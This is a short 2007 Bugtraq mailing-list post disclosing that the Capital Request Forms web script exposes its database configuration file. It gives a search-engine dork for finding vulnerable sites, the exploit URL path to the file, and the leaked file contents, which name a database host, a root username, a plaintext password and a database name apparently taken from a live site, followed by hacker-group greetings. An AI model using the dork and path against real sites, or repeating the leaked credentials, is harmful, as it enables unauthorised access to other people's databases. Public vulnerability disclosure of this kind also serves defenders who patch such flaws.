Bugtraq mailing list archives

Capital Request Forms Db Username and Password Vulnerabilities


From: gokhankaya () hotmail com
Date: 9 Feb 2007 16:10:59 -0000

##################################################################################
#
# Title         : Capital Request Forms Db Username and Password Vulnerabilities
# Author        : Gokhan
# Contact       : gokhankaya () hotmail com 
# Dork          : inurl:common_db.inc
#
# Script        : http://selfemployment.douglas.bc.ca/caprequest/
#
# ExpLoit       : http://[site]/[path]/inc/common_db.inc    ;)
#
#
# Code          : common_db.inc
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                       +
+  $dbhost = "localhost";       // DBHOST NAME          +
+  $dbusername = "root";        // DB USER NAME         +
+  $dbuserpassword = "sql1234"; // DB USER PASSWORD     +
+  $default_dbname = "douglas"; // DB NAME              +
+                                                       +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
#
# <?php function Tesekkurler() {
#       $thnx="GreetZ";
#       print ("$thnx : BLaCKWHITE,CanberX,LGMAN,HackerBox.EU");
#       } Tesekkurler(); 
#       // FROM TURKEY  ?>
#
#
##################################################################################


Current thread: